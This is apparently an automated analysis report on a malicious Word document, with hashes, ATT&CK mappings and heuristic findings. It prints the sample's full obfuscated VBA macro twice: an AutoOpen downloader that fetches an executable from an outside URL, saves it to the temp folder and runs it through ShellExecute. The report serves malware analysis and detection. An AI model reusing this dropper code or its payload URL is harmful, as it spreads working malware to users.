Office (OLE) malware analysis — malicious · 0bbb5c489e318ded

MALICIOUS

Office (OLE)

48.0 KB Created: 2016-01-21 21:14:00 Authoring application: Microsoft Office Word First seen: 2016-02-21

MD5: 53cabe0645198e2d77a037b18a156e66 SHA-1: 04d81e5c23b90732d840ba7211f7823413d264a9 SHA-256: 0bbb5c489e318ded7c06df6587edbe147bfa84d54d2bb4ee297b0958ba6405e6

238 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample contains VBA macros that trigger on AutoOpen. The script downloads a file from 'http://geobrugg.co.kr/bbs/factuur2390.exe' and saves it to the user's temporary directory, then executes it. The document body prompts the user to enable macros, indicating a social engineering lure.

Heuristics 9

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Write ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.responseBody
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d = CreateObject("MSXML2.XMLHTTP")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3 = Environ("tmp") & "\" & Mid(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, InStrRev(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, "/") + 1, Len(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351))

Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://geobrugg.co.kr/bbs/factuur2390.exe Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4908 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4908 bytes
SHA-256: `2ecd3311e4fa7642ef7bd2e38456ce107f79c2a91faa3c8df5f576eea6f7f2c7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "aa895840058ed4c70ae08" Sub AutoOpen() Dim afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e3 As New a9b01089d6b064bdc85d0 Dim a14cd0e0b60bb4e2abdee537820a7a09810e5ce7329c54c6c82abfd49caafdf5a As New ac57e47e0346046678ddb a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351 = "http://geobrugg.co.kr/bbs/factuur2390.exe" a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3 = Environ("tmp") & "\" & Mid(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, InStrRev(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, "/") + 1, Len(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351)) afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e3.a8ecbd4bdee184464bdce3ad8375f3cf57989b35d8c2b43d8a75f5ae0f3670b38 a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3 a14cd0e0b60bb4e2abdee537820a7a09810e5ce7329c54c6c82abfd49caafdf5a.a0e262c471bbe4db7ab32f42704697b0674eb310c83b742789265b39fb073885e a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3 End Sub Attribute VB_Name = "a9b01089d6b064bdc85d0" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub a8ecbd4bdee184464bdce3ad8375f3cf57989b35d8c2b43d8a75f5ae0f3670b38(a02365916d1854214a69bde788dabeca0708f0530f64a4989accb58909a9c80c9, a98ee337513494e8cb897104e5fcf80b6a9a2da3ec0924d6b8187993a63b38957) Set ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d = CreateObject("MSXML2.XMLHTTP") Set afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30 = CreateObject("ADODB.Stream") ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.Open "GET", a02365916d1854214a69bde788dabeca0708f0530f64a4989accb58909a9c80c9, False ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.send afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Type = 1 afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Open afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Write ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.responseBody afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.SaveToFile a98ee337513494e8cb897104e5fcf80b6a9a2da3ec0924d6b8187993a63b38957, 2 afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Close End Sub Attribute VB_Name = "ac57e47e0346046678ddb" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False #If VBA7 Then Private Declare PtrSafe Function afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e32 As Integer, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e33 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e34 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e36 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e37 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e38 As Integer) As Integer #Else Private Declare Function afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e32 As Integer, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e33 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e34 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e36 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e37 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e38 As Integer) As Integer #End If Sub a0e262c471bbe4db7ab32f42704697b0674eb310c83b742789265b39fb073885e(afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e39) afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 0, "open", afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e39, "", "", 1 End Sub

SHA-256: 2ecd3311e4fa7642ef7bd2e38456ce107f79c2a91faa3c8df5f576eea6f7f2c7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "aa895840058ed4c70ae08"
Sub AutoOpen()
Dim afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e3 As New a9b01089d6b064bdc85d0
Dim a14cd0e0b60bb4e2abdee537820a7a09810e5ce7329c54c6c82abfd49caafdf5a As New ac57e47e0346046678ddb
a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351 = "http://geobrugg.co.kr/bbs/factuur2390.exe"
a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3 = Environ("tmp") & "\" & Mid(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, InStrRev(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, "/") + 1, Len(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351))
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e3.a8ecbd4bdee184464bdce3ad8375f3cf57989b35d8c2b43d8a75f5ae0f3670b38 a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3
a14cd0e0b60bb4e2abdee537820a7a09810e5ce7329c54c6c82abfd49caafdf5a.a0e262c471bbe4db7ab32f42704697b0674eb310c83b742789265b39fb073885e a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3
End Sub

Attribute VB_Name = "a9b01089d6b064bdc85d0"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub a8ecbd4bdee184464bdce3ad8375f3cf57989b35d8c2b43d8a75f5ae0f3670b38(a02365916d1854214a69bde788dabeca0708f0530f64a4989accb58909a9c80c9, a98ee337513494e8cb897104e5fcf80b6a9a2da3ec0924d6b8187993a63b38957)
Set ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d = CreateObject("MSXML2.XMLHTTP")
Set afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30 = CreateObject("ADODB.Stream")
ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.Open "GET", a02365916d1854214a69bde788dabeca0708f0530f64a4989accb58909a9c80c9, False
ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.send
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Type = 1
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Open
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Write ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.responseBody
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.SaveToFile a98ee337513494e8cb897104e5fcf80b6a9a2da3ec0924d6b8187993a63b38957, 2
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Close
End Sub

Attribute VB_Name = "ac57e47e0346046678ddb"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 Then
Private Declare PtrSafe Function afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e32 As Integer, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e33 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e34 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e36 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e37 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e38 As Integer) As Integer
#Else
Private Declare Function afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e32 As Integer, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e33 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e34 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e36 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e37 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e38 As Integer) As Integer
#End If
Sub a0e262c471bbe4db7ab32f42704697b0674eb310c83b742789265b39fb073885e(afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e39)
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 0, "open", afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e39, "", "", 1
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.